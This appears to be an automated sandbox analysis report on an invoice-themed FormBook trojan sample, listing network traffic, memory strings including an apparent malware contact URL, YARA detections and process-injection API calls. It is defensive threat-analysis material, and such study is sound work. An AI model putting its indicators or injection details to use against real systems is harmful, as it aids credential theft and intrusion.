74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:58:28 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:58:30 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:58:33 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: cacls.exe, 0000000C.00000002.4653682841.0000000004326000.00000004.10000000.00040000.00000000.sdmp, fXZvHKoWCzop.exe, 0000000E.00000002.4650779219.0000000002DD6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
Source: cacls.exe, 0000000C.00000002.4653682841.000000000496E000.00000004.10000000.00040000.00000000.sdmp, fXZvHKoWCzop.exe, 0000000E.00000002.4650779219.000000000341E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://github.com/necolas/normalize.css
Source: fXZvHKoWCzop.exe, 0000000E.00000002.4648426160.00000000008DF000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.hellogus.online
Source: fXZvHKoWCzop.exe, 0000000E.00000002.4648426160.00000000008DF000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.hellogus.online/zrnp/
Source: cacls.exe, 0000000C.00000003.3269055046.00000000082E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: cacls.exe, 0000000C.00000003.3269055046.00000000082E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: cacls.exe, 0000000C.00000003.3269055046.00000000082E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: cacls.exe, 0000000C.00000003.3269055046.00000000082E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: cacls.exe, 0000000C.00000003.3269055046.00000000082E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: cacls.exe, 0000000C.00000003.3269055046.00000000082E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: cacls.exe, 0000000C.00000003.3269055046.00000000082E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: cacls.exe, 0000000C.00000002.4647612526.0000000003192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: cacls.exe, 0000000C.00000003.3260416485.00000000082C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: cacls.exe, 0000000C.00000002.4647612526.00000000031B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
Source: cacls.exe, 0000000C.00000002.4647612526.00000000031B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: cacls.exe, 0000000C.00000002.4647612526.00000000031B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: cacls.exe, 0000000C.00000002.4647612526.0000000003192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: cacls.exe, 0000000C.00000002.4647612526.00000000031B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: cacls.exe, 0000000C.00000002.4647612526.0000000003192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: cacls.exe, 0000000C.00000003.3269055046.00000000082E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: cacls.exe, 0000000C.00000003.3269055046.00000000082E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 3.2.FACTURA 24V70 VINS.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.FACTURA 24V70 VINS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.4650294834.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4650098497.0000000003530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4648426160.0000000000880000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3039119542.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3037420382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3038070342.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.FACTURA 24V70 VINS.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.FACTURA 24V70 VINS.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.4650294834.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.4650098497.0000000003530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.4648426160.0000000000880000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.3039119542.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.3037420382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.3038070342.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Contains functionality to call native functions

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07600804 NtQueryInformationProcess,	1_2_07600804
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07605F68 NtQueryInformationProcess,	1_2_07605F68
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0042C5F3 NtClose,	3_2_0042C5F3
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772B60 NtClose,LdrInitializeThunk,	3_2_01772B60
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772DF0 NtQuerySystemInformation,LdrInitializeThunk,	3_2_01772DF0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772C70 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_01772C70
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017735C0 NtCreateMutant,LdrInitializeThunk,	3_2_017735C0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01774340 NtSetContextThread,	3_2_01774340
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01774650 NtSuspendThread,	3_2_01774650
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772BF0 NtAllocateVirtualMemory,	3_2_01772BF0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772BE0 NtQueryValueKey,	3_2_01772BE0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772BA0 NtEnumerateValueKey,	3_2_01772BA0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772B80 NtQueryInformationFile,	3_2_01772B80
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772AF0 NtWriteFile,	3_2_01772AF0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772AD0 NtReadFile,	3_2_01772AD0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772AB0 NtWaitForSingleObject,	3_2_01772AB0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772D30 NtUnmapViewOfSection,	3_2_01772D30
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772D10 NtMapViewOfSection,	3_2_01772D10
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772D00 NtSetInformationFile,	3_2_01772D00
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772DD0 NtDelayExecution,	3_2_01772DD0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772DB0 NtEnumerateKey,	3_2_01772DB0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772C60 NtCreateKey,	3_2_01772C60
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772C00 NtQueryInformationProcess,	3_2_01772C00
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772CF0 NtOpenProcess,	3_2_01772CF0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772CC0 NtQueryVirtualMemory,	3_2_01772CC0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772CA0 NtQueryInformationToken,	3_2_01772CA0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772F60 NtCreateProcessEx,	3_2_01772F60
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772F30 NtCreateSection,	3_2_01772F30
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772FE0 NtCreateFile,	3_2_01772FE0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772FB0 NtResumeThread,	3_2_01772FB0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772FA0 NtQuerySection,	3_2_01772FA0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772F90 NtProtectVirtualMemory,	3_2_01772F90
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772E30 NtWriteVirtualMemory,	3_2_01772E30
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772EE0 NtQueueApcThread,	3_2_01772EE0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772EA0 NtAdjustPrivilegesToken,	3_2_01772EA0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01772E80 NtReadVirtualMemory,	3_2_01772E80
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01773010 NtOpenDirectoryObject,	3_2_01773010
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01773090 NtSetValueKey,	3_2_01773090
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017739B0 NtGetContextThread,	3_2_017739B0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01773D70 NtOpenThread,	3_2_01773D70
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01773D10 NtOpenProcessToken,	3_2_01773D10
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03744340 NtSetContextThread,LdrInitializeThunk,	12_2_03744340
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03744650 NtSuspendThread,LdrInitializeThunk,	12_2_03744650
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742B60 NtClose,LdrInitializeThunk,	12_2_03742B60
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	12_2_03742BF0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742BE0 NtQueryValueKey,LdrInitializeThunk,	12_2_03742BE0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742BA0 NtEnumerateValueKey,LdrInitializeThunk,	12_2_03742BA0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742AF0 NtWriteFile,LdrInitializeThunk,	12_2_03742AF0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742AD0 NtReadFile,LdrInitializeThunk,	12_2_03742AD0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742F30 NtCreateSection,LdrInitializeThunk,	12_2_03742F30
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742FE0 NtCreateFile,LdrInitializeThunk,	12_2_03742FE0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742FB0 NtResumeThread,LdrInitializeThunk,	12_2_03742FB0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742EE0 NtQueueApcThread,LdrInitializeThunk,	12_2_03742EE0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742E80 NtReadVirtualMemory,LdrInitializeThunk,	12_2_03742E80
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742D30 NtUnmapViewOfSection,LdrInitializeThunk,	12_2_03742D30
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742D10 NtMapViewOfSection,LdrInitializeThunk,	12_2_03742D10
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742DF0 NtQuerySystemInformation,LdrInitializeThunk,	12_2_03742DF0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742DD0 NtDelayExecution,LdrInitializeThunk,	12_2_03742DD0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742C70 NtFreeVirtualMemory,LdrInitializeThunk,	12_2_03742C70
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742C60 NtCreateKey,LdrInitializeThunk,	12_2_03742C60
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742CA0 NtQueryInformationToken,LdrInitializeThunk,	12_2_03742CA0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037435C0 NtCreateMutant,LdrInitializeThunk,	12_2_037435C0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_037439B0 NtGetContextThread,LdrInitializeThunk,	12_2_037439B0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742B80 NtQueryInformationFile,	12_2_03742B80
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742AB0 NtWaitForSingleObject,	12_2_03742AB0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742F60 NtCreateProcessEx,	12_2_03742F60
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742FA0 NtQuerySection,	12_2_03742FA0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742F90 NtProtectVirtualMemory,	12_2_03742F90
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742E30 NtWriteVirtualMemory,	12_2_03742E30
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742EA0 NtAdjustPrivilegesToken,	12_2_03742EA0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742D00 NtSetInformationFile,	12_2_03742D00
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742DB0 NtEnumerateKey,	12_2_03742DB0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742C00 NtQueryInformationProcess,	12_2_03742C00
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742CF0 NtOpenProcess,	12_2_03742CF0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03742CC0 NtQueryVirtualMemory,	12_2_03742CC0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03743010 NtOpenDirectoryObject,	12_2_03743010
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03743090 NtSetValueKey,	12_2_03743090
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03743D70 NtOpenThread,	12_2_03743D70
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_03743D10 NtOpenProcessToken,	12_2_03743D10
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_02DB8F20 NtCreateFile,	12_2_02DB8F20
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_02DB9220 NtClose,	12_2_02DB9220
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_02DB9390 NtAllocateVirtualMemory,	12_2_02DB9390
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_02DB9090 NtReadFile,	12_2_02DB9090
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 12_2_02DB9180 NtDeleteFile,	12_2_02DB9180

Detected potential crypto function

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_0150DC4C	1_2_0150DC4C
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_02F948C0	1_2_02F948C0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_02F90040	1_2_02F90040
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_02F90006	1_2_02F90006
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_02F90478	1_2_02F90478
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_02F90469	1_2_02F90469
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_02F90E28	1_2_02F90E28
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_056E9D18	1_2_056E9D18
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_056ECCA6	1_2_056ECCA6
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_056ED7D8	1_2_056ED7D8
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_056E7CE0	1_2_056E7CE0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_056E7CD0	1_2_056E7CD0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_076032B0	1_2_076032B0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07601FE0	1_2_07601FE0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_0760BA58	1_2_0760BA58
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_0760E75C	1_2_0760E75C
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_076053C8	1_2_076053C8
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_076032AB	1_2_076032AB
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07606138	1_2_07606138
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07607F73	1_2_07607F73
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07607F78	1_2_07607F78
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07601FDB	1_2_07601FDB
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07604F83	1_2_07604F83
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07607D03	1_2_07607D03
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07607D08	1_2_07607D08
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_0760EBC8	1_2_0760EBC8
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_0760EBB8	1_2_0760EBB8
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07605888	1_2_07605888
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07626084	1_2_07626084
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07627553	1_2_07627553
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07626078	1_2_07626078
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_004186C3	3_2_004186C3
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0041685D	3_2_0041685D
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0041689E	3_2_0041689E
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_004168A3	3_2_004168A3
